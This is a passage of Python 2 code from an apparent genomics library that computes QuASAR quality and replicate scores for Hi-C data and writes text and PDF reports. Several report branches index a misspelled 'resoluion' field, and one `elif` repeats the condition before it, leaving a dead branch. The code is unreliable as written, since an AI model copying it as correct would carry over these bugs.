coverages = numpy.intersect1d(self.storage['coverages'][...], replicate.storage['coverages'][...])
if coverages[0] == 0:
coverages[:-1] = coverages[1:]
coverages[-1] = 0
tcoverages = numpy.copy(coverages)
if tcoverages[-1] == 0:
tcoverages[-1] = (self.storage.attrs['total_reads'] + replicate.storage.attrs['total_reads']) / 2
starts1 = numpy.zeros(chroms.shape[0], dtype=numpy.int64)
starts2 = numpy.zeros(chroms.shape[0], dtype=numpy.int64)
for i, chrom in enumerate(chroms):
starts1[i] = numpy.where(self.storage['chromosomes'][...] == chrom)[0][0]
starts2[i] = numpy.where(replicate.storage['chromosomes'][...] == chrom)[0][0]
scores = numpy.zeros((resolutions.shape[0], coverages.shape[0], chroms.shape[0] + 1), dtype=numpy.float64)
scores.fill(numpy.nan)
for j, res in enumerate(resolutions):
for k, cov in enumerate(coverages):
temp = numpy.zeros(6, dtype=numpy.float64)
for i, chrom in enumerate(chroms):
key = '%s.%iC.%iR' % (chrom, cov, res)
if 'valid.%s' % key in self.storage and 'valid.%s' % key in replicate.storage:
valid_rows1 = self.storage['valid.%s' % key][...]
dists1 = (1 + self.storage['dist.%s' % key][...]) ** 0.5
corrs1 = self.storage['corr.%s' % key][...][:, :dists1.shape[1]]
valid1 = numpy.zeros(corrs1.shape, dtype=numpy.bool)
N, M = corrs1.shape
for l in range(min(N - 1, M)):
P = N - l - 1
valid1[:P, l] = valid_rows1[(l + 1):] * valid_rows1[:P]
valid1[numpy.where((numpy.abs(dists1) == numpy.inf) | (numpy.abs(corrs1) == numpy.inf))] = 0
valid_rows2 = replicate.storage['valid.%s' % key][...]
dists2 = (1 + replicate.storage['dist.%s' % key][...]) ** 0.5
corrs2 = replicate.storage['corr.%s' % key][...][:, :dists2.shape[1]]
valid2 = numpy.zeros(corrs2.shape, dtype=numpy.bool)
N, M = corrs2.shape
for l in range(min(N - 1, M)):
P = N - l - 1
valid2[:P, l] = valid_rows2[(l + 1):] * valid_rows2[:P]
valid2[numpy.where((numpy.abs(dists2) == numpy.inf) | (numpy.abs(corrs2) == numpy.inf))] = 0
start1 = starts1[i]
start2 = starts2[i]
if start2 > start1:
start1 = (start2 - start1) / res
start2 = 0
elif start2 > start1:
start2 = (start1 - start2) / res
start1 = 0
else:
start1 = 0
start2 = 0
stop1 = corrs1.shape[0] - start1
stop2 = corrs2.shape[0] - start2
if stop2 > stop1:
stop2 = stop1 + start2
stop1 = start1 + stop1
else:
stop1 = stop2 + start1
stop2 = start2 + stop2
stop3 = min(corrs1.shape[1], corrs2.shape[1])
valid1 = valid1[start1:stop1, :stop3]
valid2 = valid2[start2:stop2, :stop3]
valid = numpy.where(valid1 & valid2)
if valid[0].shape[0] == 0:
continue
trans1 = corrs1[start1:stop1, :stop3][valid] * dists1[start1:stop1, :stop3][valid]
trans2 = corrs2[start2:stop2, :stop3][valid] * dists2[start2:stop2, :stop3][valid]
X = numpy.sum(trans1)
Y = numpy.sum(trans2)
X2 = numpy.sum(trans1 ** 2.0)
Y2 = numpy.sum(trans2 ** 2.0)
XY = numpy.sum(trans1 * trans2)
N = valid[0].shape[0]
if N == 0:
continue
temp += [X, Y, X2, Y2, XY, N]
Xmu = X / N
Ymu = Y / N
X2mu = X2 / N
Y2mu = Y2 / N
XYmu = XY / N
if Xmu ** 2.0 > X2mu or Ymu ** 2.0 > Y2mu:
continue
Xstd = (X2mu - Xmu ** 2.0) ** 0.5
Ystd = (Y2mu - Ymu ** 2.0) ** 0.5
if Xstd == 0 or Ystd == 0:
continue
scores[j, k, i] = (XYmu - Xmu * Ymu) / (Xstd * Ystd)
Xmu = temp[0] / temp[5]
Ymu = temp[1] / temp[5]
X2mu = temp[2] / temp[5]
Y2mu = temp[3] / temp[5]
XYmu = temp[4] / temp[5]
Xstd = (X2mu - Xmu ** 2.0) ** 0.5
Ystd = (Y2mu - Ymu ** 2.0) ** 0.5
scores[j, k, -1] = (XYmu - Xmu * Ymu) / (Xstd * Ystd)
all_chroms = numpy.r_[chroms, numpy.array(['All'])]
results = numpy.zeros(scores.shape[0] * scores.shape[1] * scores.shape[2], dtype=numpy.dtype([
('chromosome', all_chroms.dtype), ('resolution', numpy.int64), ('coverage', numpy.int64), ('score', numpy.float64)]))
results['score'] = scores.ravel(order='C')
results['resolution'] = numpy.repeat(resolutions, scores.shape[1] * scores.shape[2])
results['coverage'] = numpy.tile(numpy.repeat(coverages, scores.shape[2]), scores.shape[0])
results['chromosome'] = numpy.tile(all_chroms, scores.shape[0] * scores.shape[1])
return results
def print_report(self, filename, qscores=None, rscores=None, scores_only=False):
"""
Write QuASAR scores to output file.
:param filename: The location to write the report to. The suffix will be used to determine the output format.
:type filename: str.
:returns: None
"""
if self.rank > 0:
return None
if qscores is None and rscores is None:
if not self.silent:
print >> sys.stderr, ("\r%s\rNo scores found. Calculate quality and/or replicate scores first.\n") % (
' ' * 80),
return None
format = filename.split('.')[-1]
if format not in ['pdf', 'txt']:
format = 'txt'
if format == 'txt':
self._print_txt_report(filename, qscores, rscores, scores_only)
elif format == 'pdf':
if 'pyx' in sys.modules.keys():
self._print_pdf_report(filename, qscores, rscores, scores_only)
elif not self.silent:
print >> sys.stderr, ("\r%s\rThe pyx package is needed for writing PDFs.\n") % (' ' * 80),
else:
self._print_html_report(filename, qscores, rscores, scores_only)
return None
def _transfer_dict(self, data, dest, source):
if self.rank == dest:
key = self.comm.recv(source=source, tag=5)
while key:
shape, dtype = self.comm.recv(source=source, tag=6)
if shape is None:
data[key] = None
else:
data[key] = numpy.zeros(shape, dtype=dtype)
self.comm.Recv(data[key], source=source, tag=7)
key = self.comm.recv(source=source, tag=5)
elif self.rank == source:
for key, value in data.iteritems():
self.comm.send(key, dest=dest, tag=5)
if value is None:
self.comm.send([None, None], dest=dest, tag=6)
else:
self.comm.send([value.shape, value.dtype], dest=dest, tag=6)
self.comm.Send(value, dest=dest, tag=7)
self.comm.send(False, dest=dest, tag=5)
return None
def _downsample(self, data, indices, target_count, rng=None):
if target_count == 0:
return numpy.copy(data), numpy.copy(indices)
elif numpy.sum(data[:, 2]) == target_count:
return numpy.copy(data), numpy.copy(indices)
if rng is None:
rng = numpy.random.RandomState()
initial_count = numpy.sum(data[:, 2])
percent = target_count / float(initial_count)
# select which reads to keep, based on percent of reads to keep
keep = rng.rand(initial_count) < percent
# adjust mismatch between selected read count and target read count by selecting reads to add/remove
kept = numpy.sum(keep)
if kept > target_count:
pool_size = kept
adjust_size = kept - target_count
remove = True
elif kept < target_count:
pool_size = initial_count - kept
adjust_size = target_count - kept
remove = False
else:
adjust_size = 0
reads = {}
while len(reads) < adjust_size:
temp_rand = rng.randint(0, pool_size, adjust_size * 2)
for i in range(temp_rand.shape[0]):
reads[temp_rand[i]] = None
if len(reads) == adjust_size:
break
if adjust_size > 0:
if remove:
where = numpy.where(keep)[0]
for i in where[reads.keys()]:
keep[i] = False
else:
where = numpy.where(numpy.logical_not(keep))[0]
for i in where[reads.keys()]:
keep[i] = True
# adjust read counts in data
counts = numpy.repeat(numpy.arange(data.shape[0]), data[:, 2])
new_data = numpy.copy(data)
new_data[:, 2] = numpy.bincount(counts, weights=keep, minlength=data.shape[0])
new_indices = numpy.zeros(indices.shape[0], dtype=numpy.int64)
for i in range(1, new_indices.shape[0]):
new_indices[i] = numpy.sum(new_data[indices[i - 1]:indices[i], 2] > 0) + new_indices[i - 1]
new_data = new_data[numpy.where(new_data[:, 2] > 0)[0], :]
return new_data, new_indices
def _normalize(self, chrom, raw, mids, binsize):
width = 100
# downbin if necessary
curr_binsize = mids[1] - mids[0]
if curr_binsize != binsize:
mapping = mids / binsize
mapping -= mapping[0]
N = mapping[-1] + 1
indices = mapping[raw[:, 0]] * N + mapping[raw[:, 1]]
uindices = numpy.unique(indices)
data = numpy.zeros((uindices.shape[0], 3), dtype=numpy.int64)
data[:, 0] = uindices / N
data[:, 1] = uindices % N
data[:, 2] = numpy.bincount(numpy.searchsorted(uindices, indices), weights=raw[:, 2])
else:
data = raw
N = mids.shape[0]
# filter rows with too few observations
prev_valid_rows = N + 1
valid_rows = numpy.ones(N, dtype=numpy.int32)
# we need several non-zero observations for finding correlations
while numpy.sum(valid_rows) < prev_valid_rows:
prev_valid_rows = numpy.sum(valid_rows)
sums = numpy.zeros(N, dtype=numpy.int32)
_quasar.filter_bins(
data,
sums,
valid_rows,
width)
valid_rows[:] = sums >= 1
valid = numpy.where(valid_rows)[0]
if valid.shape[0] == 0:
return None, None, None
# find distance dependent signal and compact data array for weighting correlation matrix
bg = numpy.ones(width, dtype=numpy.float64)
temp = numpy.zeros((width, 2), dtype=numpy.int64)
dist = numpy.zeros((N, min(width, N - 1)), dtype=numpy.float64)
norm = numpy.zeros((N, width * 2), dtype=numpy.float64)
_quasar.find_bg_dist_norm(
data,
valid_rows,
temp,
bg,
dist,
norm)
# remove bg from norm
for i in range(N):
norm[i, :width] /= bg[::-1]
norm[i, width:] /= bg
return norm, dist, valid_rows
def _find_correlations(self, norm=None, vrows=None):
width = 100
if self.rank == 0:
if norm is None:
if self.comm is not None:
err = self.comm.bcast(True, root=0)
return None
N = norm.shape[0]
if self.comm is not None:
N = self.comm.bcast(N, root=0)
self.comm.Bcast(vrows, root=0)
node_ranges = numpy.round(numpy.linspace(0, N, self.num_procs + 1)).astype(numpy.int32)
for i in range(1, self.num_procs):
self.comm.send([node_ranges[i], node_ranges[i + 1], min(node_ranges[i + 1] + width, N)], dest=i)
self.comm.Send(norm[node_ranges[i]:min(node_ranges[i + 1] + width, N), :], dest=i)
start = 0
stop = node_ranges[1]
stop2 = min(node_ranges[1] + width, N)
else:
err = self.comm.bcast(None, root=0)
if err:
return None
N = self.comm.bcast(None, root=0)
vrows = numpy.zeros(N, dtype=numpy.int32)
self.comm.Bcast(vrows, root=0)
start, stop, stop2, N = self.comm.recv(source=0)
norm = numpy.zeros((stop2 - start, width * 2), dtype=numpy.float64)
self.comm.Recv(norm, source=0)
corr = numpy.zeros((stop - start, width), dtype=numpy.float64)
corr.fill(numpy.inf)
_quasar.find_correlations(
norm,
vrows,
corr,
start)
if self.rank == 0:
corrs = numpy.zeros((N, width), dtype=numpy.float64)
corrs[:corr.shape[0], :] = corr
del corr
for i in range(1, self.num_procs):
self.comm.Recv(corrs[node_ranges[i]:node_ranges[i + 1], :], source=i)
return corrs
else:
self.comm.Send(corr, dest=0)
del corr
return None
def _print_txt_report(self, filename, qscores, rscores, scores_only=False):
output = open(filename, 'w')
if qscores is not None:
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(qscores['chromosome'][numpy.where(qscores['chromosome'] != 'All')])]
resolutions = numpy.unique(qscores['resolution'])
coverages = numpy.unique(qscores['coverage'])
if numpy.where(coverages == 0)[0].shape[0] > 0:
zero_cov = self.storage.attrs['total_reads']
print >> output, 'Quality Score Results\n'
temp = ['Resolution', 'Coverage'] + list(chromosomes)
print >> output, '\t'.join(temp)
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
for j, cov in enumerate(coverages):
if cov == 0:
temp = [label, self._num2str(zero_cov)]
else:
temp = [label, self._num2str(cov)]
for k, chrom in enumerate(chromosomes):
where = numpy.where((qscores['chromosome'] == chrom) & (qscores['resolution'] == res) & (qscores['coverage'] == cov))[0][0]
temp.append("%0.6f" % qscores['score'][where])
print >> output, '\t'.join(temp)
print >> output, '\n'
# if there are sufficient data points, calculate estimated maximum
if coverages.shape[0] > 3 and not scores_only:
def f(x, x0, k, L):
return L / (1 + numpy.exp(-k * (x - x0)))
Xs = numpy.log10(coverages)
print >> output, "Estimated quality-coverage curves (Maximum Quality / (1 + e^(-Scale * (x - Inflection)))"
for i, res in enumerate(resolutions):
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['resolution'] == res))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['coverage'][where])]
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
try:
params = curve_fit(f, Xs, Ys, p0=(Xs[-1], 0.5, Ys[-1] * 2), maxfev=(5000*Xs.shape[0]),
bounds=((-numpy.inf, -numpy.inf, 0), (numpy.inf, numpy.inf, 2)))[0]
Y1s = f(Xs, *params)
print >> output, "Resolution: %s, Maximum Quality: %f, Scale: %f, Inflection: %f, Mean error: %e" % (label, params[2], params[1], params[0], numpy.mean((Ys - Y1s) ** 2.0))
except:
print >> output, "Resolution: %s, curve could not be estimated" % label
print >> output, '\n'
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = numpy.log10(resolutions)
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['coverage'] == coverages[-1]))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['resolution'][where])]
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_qcutoff > Ys[pos + 1]:
pos += 1
if self.strict_qcutoff < Ys[0]:
print >> output, "Strict quality maximum resolution is above the resolutions tested."
elif self.strict_qcutoff > numpy.amax(Ys):
print >> output, "Strict quality maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Strict quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_qcutoff - B) / A))))
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_qcutoff > Ys[pos + 1]:
pos += 1
if self.loose_qcutoff < Ys[0]:
print >> output, "Loose quality maximum resolution is above the resolutions tested."
elif self.loose_qcutoff > numpy.amax(Ys):
print >> output, "Loose quality maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Loose quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_qcutoff - B) / A))))
print >> output, '\n'
if rscores is not None:
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(rscores['chromosome'][numpy.where(rscores['chromosome'] != 'All')])]
resolutions = numpy.unique(rscores['resolution'])
coverages = numpy.unique(rscores['coverage'])
print >> output, 'Replicate Score Results\n'
temp = ['Resolution', 'Coverage'] + list(chromosomes)
print >> output, '\t'.join(temp)
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
for j, cov in enumerate(coverages):
temp = [label, self._num2str(cov)]
for k, chrom in enumerate(chromosomes):
where = numpy.where((rscores['chromosome'] == chrom) & (rscores['resolution'] == res) & (rscores['coverage'] == cov))[0][0]
temp.append("%0.6f" % rscores['score'][where])
print >> output, '\t'.join(temp)
print >> output, '\n'
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = numpy.log10(resolutions)
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['coverage'] == coverages[-1]))[0]
Ys = rscores['score'][where]
Ys = Ys[numpy.argsort(rscores['resoluion'][where])]
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_rcutoff > Ys[pos + 1]:
pos += 1
if self.strict_rcutoff < Ys[0]:
print >> output, "Strict replicate maximum resolution is above the resolutions tested."
elif self.strict_rcutoff > numpy.amax(Ys):
print >> output, "Strict replicate maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Strict replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_rcutoff - B) / A))))
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_rcutoff > Ys[pos + 1]:
pos += 1
if self.loose_rcutoff < Ys[0]:
print >> output, "Loose replicate maximum resolution is above the resolutions tested."
elif self.loose_rcutoff > numpy.amax(Ys):
print >> output, "Loose replicate maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Loose replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_rcutoff - B) / A))))
print >> output, '\n'
output.close()
return None
def _print_pdf_report(self, filename, qscores, rscores, scores_only=False):
c = canvas.canvas()
H = 0
if qscores is not None:
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(qscores['chromosome'][numpy.where(qscores['chromosome'] != 'All')])]
resolutions = numpy.unique(qscores['resolution'])
coverages = numpy.unique(qscores['coverage'])
if numpy.where(coverages == 0)[0].shape[0] > 0:
zero_cov = self.storage.attrs['total_reads']
c.text(H, 0, "Quality Score Results", [text.halign.left, text.valign.bottom, text.size(0)])
H -= 0.6
hoffset = 1.7
for i in range(coverages.shape[0] + 1):
c.stroke(path.line(hoffset + i * 2.0, H + 0.3, hoffset + i * 2.0, H - 0.3 * resolutions.shape[0]))
if i < coverages.shape[0]:
c.text(hoffset + (i + 0.5) * 2.0, H + 0.05, self._num2str(coverages[i]),
[text.halign.center, text.valign.bottom, text.size(-2)])
for i in range(resolutions.shape[0] + 1):
c.stroke(path.line(0, H - 0.3 * i, hoffset + coverages.shape[0] * 2.0, H - 0.3 * i))
c.text(hoffset + 1.0 * coverages.shape[0], H + 0.35, "Coverage",
[text.halign.center, text.valign.bottom, text.size(-2)])
c.text(hoffset - 0.1, H + 0.05, "Resolution",
[text.halign.right, text.valign.bottom, text.size(-2)])
H -= 0.3
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
c.text(hoffset - 0.1, H + 0.05, label, [text.halign.right, text.valign.bottom, text.size(-2)])
for j, cov in enumerate(coverages):
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['resolution'] == res) & (qscores['coverage'] == cov))[0][0]
c.text(hoffset + (j + 0.5) * 2.0, H + 0.05, '%0.6f' % qscores['score'][where],
[text.halign.center, text.valign.bottom, text.size(-2)])
H -= 0.3
H -= 0.6
hoffset = 0.9
# if there are sufficient data points, calculate estimated maximum quality
if coverages.shape[0] > 3 and not scores_only:
width = 17.0 / min(3, resolutions.shape[0]) - 0.3
def f(x, x0, k, L):
return L / (1 + numpy.exp(-k * (x - x0)))
Xs = coverages
lXs = numpy.log10(coverages)
c.text(0, H, r"Estimated quality-coverage curves $\frac{Maximum Quality}{1 + e^{-Scale * (x - Inflection)}}$", [text.halign.left, text.valign.bottom, text.size(-2)])
H -= 0.3
passed = False
for i, res in enumerate(resolutions):
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['resolution'] == res))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['coverage'][where])]
c1 = self._plot_graph(Xs, Ys, width, 'q')
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
try:
params = curve_fit(f, lXs, Ys, p0=(lXs[-1], 0.5, Ys[-1] * 2), maxfev=(5000*Xs.shape[0]),
bounds=((-numpy.inf, -numpy.inf, 0), (numpy.inf, numpy.inf, 2)))[0]
Y1s = f(lXs, *params)
passed = True
minX = numpy.log2(numpy.amin(Xs))
maxX = numpy.log2(numpy.amax(Xs))
minY = numpy.amin(Ys)
maxY = numpy.amax(Ys)
spanY = maxY - minY
minY -= 0.05 * spanY
maxY += 0.05 * spanY
c3 = canvas.canvas()
c3.insert(self._plot_line(Xs, Y1s, width, minX, maxX, minY, maxY, color.gray(0.5)))
c3.insert(c1)
c1 = c3
c1.text(hoffset, -0.15, "Resolution: %s" % label,
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -0.45, "Maximum Quality: %f" % params[2],
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -0.75, "Scale: %f," % params[1],
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -1.05, "Inflection: %f" % params[0],
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -1.35, "Mean Error: %e" % numpy.mean((Ys - Y1s) ** 2.0),
[text.halign.left, text.valign.top, text.size(-2)])
except:
c1.text(hoffset, -0.15, "Resolution: %s" % label,
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -0.45, "curve could not be estimated",
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate((width + 0.3) * i, H - width)])
if passed:
H -= width + 2.0
else:
H -= width + 1.1
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = resolutions
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['coverage'] == coverages[-1]))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['resoluion'][where])]
width = 17.0 / 3.0 - 0.3
c1 = self._plot_graph(Xs, Ys, width, 'q', 'res')
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_qcutoff > Ys[pos + 1]:
pos += 1
if self.strict_qcutoff < Ys[0]:
c1.text(0, -0.15, "Strict quality maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.strict_qcutoff > numpy.amax(Ys):
c1.text(0, -0.15, "Strict quality maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (numpy.log10(Xs[pos + 1]) - numpy.log10(Xs[pos]))
B = Ys[pos] - numpy.log10(Xs[pos]) * A
c1.text(0, -0.15, "Strict quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_qcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_qcutoff > Ys[pos + 1]:
pos += 1
if self.loose_qcutoff < Ys[0]:
c1.text(0, -0.45, "Loose quality maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.loose_qcutoff > numpy.amax(Ys):
c1.text(0, -0.45, "Loose quality maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (numpy.log10(Xs[pos + 1]) - numpy.log10(Xs[pos]))
B = Ys[pos] - numpy.log10(Xs[pos]) * A
c1.text(0, -0.45, "Loose quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_qcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate(0, H - width)])
H -= width + 1.1
if rscores is not None:
H -= 0.4
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(rscores['chromosome'][numpy.where(rscores['chromosome'] != 'All')])]
resolutions = numpy.unique(rscores['resolution'])
coverages = numpy.unique(rscores['coverage'])
c.text(0, H, "Replicate Score Results", [text.halign.left, text.valign.bottom, text.size(0)])
H -= 0.6
hoffset = 1.7
for i in range(coverages.shape[0] + 1):
c.stroke(path.line(hoffset + i * 2.0, H + 0.3, hoffset + i * 2.0, H - 0.3 * resolutions.shape[0]))
if i < coverages.shape[0]:
c.text(hoffset + (i + 0.5) * 2.0, H + 0.05, self._num2str(coverages[i]),
[text.halign.center, text.valign.bottom, text.size(-2)])
for i in range(resolutions.shape[0] + 1):
c.stroke(path.line(0, H - 0.3 * i, hoffset + coverages.shape[0] * 2.0, H - 0.3 * i))
c.text(hoffset + 1.0 * coverages.shape[0], H + 0.35, "Coverage",
[text.halign.center, text.valign.bottom, text.size(-2)])
c.text(hoffset - 0.1, H + 0.05, "Resolution",
[text.halign.right, text.valign.bottom, text.size(-2)])
H -= 0.3
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
c.text(hoffset - 0.1, H + 0.05, label, [text.halign.right, text.valign.bottom, text.size(-2)])
for j, cov in enumerate(coverages):
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['resolution'] == res) & (rscores['coverage'] == cov))[0][0]
c.text(hoffset + (j + 0.5) * 2.0, H + 0.05, '%0.6f' % rscores['score'][where],
[text.halign.center, text.valign.bottom, text.size(-2)])
H -= 0.3
H -= 0.4
hoffset = 0.9
# if there are sufficient data points, plot coverage vs score
if coverages.shape[0] >= 2 and not scores_only:
width = 17.0 / min(3, resolutions.shape[0]) - 0.3
Xs = coverages
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['resolution'] == res))[0]
Ys = rscores['score'][where]
Ys = Ys[numpy.argsort(rscores['coverage'][where])]
c1 = self._plot_graph(Xs, Ys, width, 'r')
c1.text(hoffset, -0.15, "Resolution: %s" % label,
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate((width + 0.3) * i, H - width)])
H -= width + 0.8
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = resolutions
lXs = numpy.log10(resolutions)
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['coverage'] == coverages[-1]))[0]
Ys = rscores['score'][where]
Ys = Ys[numpy.argsort(rscores['resoluion'][where])]
width = 17.0 / 3.0 - 0.3
c1 = self._plot_graph(Xs, Ys, width, 'r', 'res')
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_rcutoff > Ys[pos + 1]:
pos += 1
if self.strict_rcutoff < Ys[0]:
c1.text(0, -0.15, "Strict replicate maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.strict_rcutoff > numpy.amax(Ys):
c1.text(0, -0.15, "Strict replicate maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (lXs[pos + 1] - lXs[pos])
B = Ys[pos] - lXs[pos] * A
c1.text(0, -0.15, "Strict replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_rcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_rcutoff > Ys[pos + 1]:
pos += 1
if self.loose_rcutoff < Ys[0]:
c1.text(0, -0.45, "Loose replicate maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.loose_rcutoff > numpy.amax(Ys):
c1.text(0, -0.45, "Loose replicate maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (lXs[pos + 1] - lXs[pos])
B = Ys[pos] - lXs[pos] * A
c1.text(0, -0.45, "Loose replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_rcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate(0, H - width)])
c.writePDFfile(filename)
return None
def _plot_graph(self, Xs, Ys, width, dtype, xaxis='cov'):
hoffset = 0.9
voffset = 0.6
pwidth = width - hoffset
pheight = width - voffset
c = canvas.canvas()
minX = numpy.log2(numpy.amin(Xs))
maxX = numpy.log2(numpy.amax(Xs))
if xaxis == 'cov':
minY = numpy.amin(Ys)
maxY = numpy.amax(Ys)
else:
if dtype == 'q':
minY = min(numpy.amin(Ys), self.loose_qcutoff)
maxY = max(numpy.amax(Ys), self.strict_qcutoff)
else:
minY = min(numpy.amin(Ys), self.loose_rcutoff)
maxY = max(numpy.amax(Ys), self.strict_rcutoff)
spanX = maxX - minX
spanY = maxY - minY
minY -= 0.05 * spanY
maxY += 0.05 * spanY
spanY = maxY - minY
c1 = self._plot_line(Xs, Ys, width, minX, maxX, minY, maxY)
if dtype == 'q':
ylab = 'Quality Score'
else:
ylab = 'Replicate Score'
c.text(0, voffset + pheight * 0.5, ylab,
[text.halign.center, text.valign.top, text.size(-2), trafo.rotate(90)])
if xaxis == 'cov':
if numpy.amin(Xs) < 1000000:
start = -1
else:
start = 0
stop = int(floor(maxX - numpy.log2(1000000)))
for i in range(start, stop + 1, 2):
val = 2 ** i
X = (i + numpy.log2(1000000) - minX) / spanX * pwidth + hoffset
c.stroke(path.line(X, voffset, X, voffset - 0.08))
c.stroke(path.line(X, voffset, X, width), [color.gray(0.9)])
if val < 0.1:
label = '%0.2f' % val
elif val < 1.0:
label = '%0.1f' % val
else:
label = '%i' % val
c.text(X, voffset - 0.1, label, [text.halign.center, text.valign.top, text.size(-2)])
for i in range(start - 2, stop + 3, 2):
xs = numpy.log2(numpy.linspace(2 ** i * 1000000, 2 ** (i + 2) * 1000000, 9)[1:-1])
xs = (xs - minX) / spanX * pwidth + hoffset
for x in xs:
if x > hoffset and x < width:
c.stroke(path.line(x, voffset, x, voffset - 0.05))
label = "Millions of Reads"
else:
for x in Xs:
X = (numpy.log2(x) - minX) / spanX * pwidth + hoffset
if x < 1000000:
label = '%iK' % (x / 1000)
else:
label = '%iM' % (x / 1000000)
c.stroke(path.line(X, voffset, X, voffset - 0.05))
c.text(X, voffset - 0.1, label, [text.halign.center, text.valign.top, text.size(-2)])
if X > hoffset and X < width:
c.stroke(path.line(X, voffset, X, width), [color.gray(0.9)])
label = "Resolution"
c.text(hoffset + pwidth * 0.5, 0, label, [text.halign.center, text.valign.bottom, text.size(-2)])
scale = 1.0
while maxY * 10 ** scale < 1.0:
scale += 1
step = 1.0
while (floor(maxY * 10 ** scale) - ceil(minY * 10 ** scale)) / step > 5:
step += 1.0
N = (floor(maxY * 10 ** scale) - ceil(minY * 10 ** scale)) / step
